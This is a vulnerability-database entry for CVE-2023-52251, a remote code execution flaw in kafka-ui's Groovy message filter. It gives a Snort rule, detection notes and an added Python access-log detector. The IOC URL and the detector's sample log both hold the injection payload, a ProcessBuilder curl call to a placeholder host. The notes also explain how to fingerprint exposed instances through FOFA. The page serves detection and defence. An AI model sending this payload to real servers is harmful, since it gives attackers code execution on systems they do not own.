cbcvebase.
CVE-2023-52251
published 2024-01-25


Priority: P1 · 89 · high · 8.8 (CVSS 3.1)
CVSS vector: AV:N AC:L PR:L UI:N S:U C:H I:H A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 85.02% (99.7th percentile)
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.

Affected

1 range

Vendor     Product  Version range  Fixed in
provectus  ui       0.4.0 – 0.7.1

Detection & IOCs (extracted from sources)

url: /api/clusters/local/topics/{topic}/messages
url: /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING
other: filterQueryType=GROOVY_SCRIPT
other: fofa-query: icon_hash="-1477045616"
snort:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Apache Kafka UI Unsanitized Groovy Script Filter Remote Code Execution Attempt (CVE-2023-52251)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/api/clusters/"; startswith; content:"/topics/"; within:50; content:"/messages?q|3d 22|"; within:50; content:"|28 29 26|filterQueryType|3d|GROOVY_SCRIPT"; distance:0; fast_pattern; reference:url,attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251; reference:cve,2023-52251; classtype:attempted-admin; sid:2050499; rev:2; metadata:affected_product Apache_Kafka, attack_target Web_Server, created_at 2024_01_25, cve CVE_2023_52251, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, updated_at 2024_03_08, reviewed_at 2024_10_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit requests are HTTP GET to the path /api/clusters/<name>/topics/<topic>/messages with the query parameter `q` containing a Groovy script payload (e.g. new ProcessBuilder(...).start()) and `filterQueryType=GROOVY_SCRIPT`.
  • The Snort/ET rule keys on the normalized URI: it must start with /api/clusters/, contain /topics/ within 50 bytes, then /messages?q=" (hex 3d 22 is the two bytes `="`) within 50 bytes, and then ()&filterQueryType=GROOVY_SCRIPT (hex 28 29 26 is `()&`) as the fast-pattern content. SID 2050499. Note that the rule expects a literal double quote immediately after q=, which the template URL listed above (q=new+ProcessBuilder...) does not contain, so coverage depends on the exact form of the payload; detections that decode the query string and key on filterQueryType=GROOVY_SCRIPT alone are more robust.
  • Successful exploitation produces the string 'Assigning partitions' in the HTTP response body; this can be used as a confirmation matcher.
  • Attackers first enumerate /api/clusters to discover the cluster name, then /api/clusters/<name>/topics to discover a topic name, before launching the injection — monitor for this reconnaissance sequence.
  • Kafka UI instances can be fingerprinted via FOFA using the icon hash -1477045616 to identify exposed targets.
  • The NVD description references the cluster name 'local' in the path, but the actual exploit dynamically enumerates the real cluster name from /api/clusters; detections hard-coded to 'local' may miss attacks against differently-named clusters.
  • The vulnerability affects Kafka UI versions 0.4.0 through 0.7.1 inclusive; version 0.7.2 and later are not affected.
  • The ET Snort rule (SID 2050499) requires SSL/TLS decryption (deployment SSLDecrypt) to fire on HTTPS-protected Kafka UI instances.
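The following detector is an added example, not part of the CVE record or the ET ruleset. It applies the bullets above to access-log lines: it percent-decodes the query string before matching (so encoded forms of the payload are not missed), matches any cluster name rather than only 'local', keys on filterQueryType=GROOVY_SCRIPT, and tracks the /api/clusters then /api/clusters/<name>/topics enumeration sequence per source address. The log format, IP addresses, cluster and topic names and the example.invalid callback host are all constructed for the example.

```python
"""Added example (not from the CVE record): flag Kafka UI Groovy-filter requests
and the enumeration sequence that precedes them in constructed access-log lines.
Log format assumed here: 'src_ip method uri status', one request per line."""
import re
from urllib.parse import parse_qs, urlsplit

# Paths named in the advisory, with cluster and topic left variable so the
# detection is not hard-coded to the cluster name "local".
MESSAGES_PATH = re.compile(
    r"^/api/clusters/(?P<cluster>[^/]+)/topics/(?P<topic>[^/]+)/messages$")
CLUSTERS_PATH = re.compile(r"^/api/clusters/?$")
TOPICS_PATH = re.compile(r"^/api/clusters/(?P<cluster>[^/]+)/topics/?$")


def inspect_request(method, raw_uri):
    """Return a finding dict for a GET that uses the Groovy filter, else None.

    parse_qs percent-decodes and '+'-decodes the query before we look at it,
    mirroring Suricata's normalized http.uri buffer; matching the raw URI
    would miss %28%22 / %29 encodings of the bytes the ET rule keys on.
    """
    if method.upper() != "GET":
        return None
    parts = urlsplit(raw_uri)
    m = MESSAGES_PATH.match(parts.path)
    if not m:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "GROOVY_SCRIPT" not in params.get("filterQueryType", []):
        return None
    script = params.get("q", [""])[0]
    # ProcessBuilder is the payload the public template uses; any Groovy
    # filter request against an unpatched (< 0.7.2) instance still merits review.
    confidence = "high" if "ProcessBuilder" in script else "medium"
    return {"cluster": m["cluster"], "topic": m["topic"],
            "confidence": confidence, "script": script}


def scan_log(lines):
    """Scan log lines; annotate each finding with whether the source address
    first enumerated clusters and topics (the reconnaissance sequence)."""
    stages = {}  # src_ip -> set of enumeration stages observed
    findings = []
    for line in lines:
        src, method, uri, _status = line.split()
        path = urlsplit(uri).path
        seen = stages.setdefault(src, set())
        if CLUSTERS_PATH.match(path):
            seen.add("clusters")
        elif TOPICS_PATH.match(path):
            seen.add("topics")
        hit = inspect_request(method, uri)
        if hit:
            hit["src"] = src
            hit["preceded_by_enum"] = {"clusters", "topics"} <= seen
            findings.append(hit)
    return findings


# Constructed sample log: one full enumerate-then-inject sequence from
# 203.0.113.7, and one Groovy filter request without prior enumeration
# from 198.51.100.4 alongside a benign message fetch.
SAMPLE_LOG = [
    "203.0.113.7 GET /api/clusters 200",
    "203.0.113.7 GET /api/clusters/prod-east/topics 200",
    "203.0.113.7 GET /api/clusters/prod-east/topics/orders/messages"
    "?q=new+ProcessBuilder%28%22curl%22%2C%22example.invalid%22%29.start%28%29"
    "&filterQueryType=GROOVY_SCRIPT&limit=100 200",
    "198.51.100.4 GET /api/clusters/prod-east/topics/orders/messages"
    "?limit=100&seekType=BEGINNING 200",
    "198.51.100.4 GET /api/clusters/prod-east/topics/orders/messages"
    "?q=true&filterQueryType=GROOVY_SCRIPT&limit=100 200",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The medium-confidence finding illustrates the false-positive trade-off: the Groovy filter is a product feature, so a bare filterQueryType=GROOVY_SCRIPT hit on a patched instance may be legitimate use, while the same request against a version in the 0.4.0 to 0.7.1 range is the vulnerable code path regardless of what the script contains.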

CVSS provenance

nvd: v3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vulncheck: 8.8 HIGH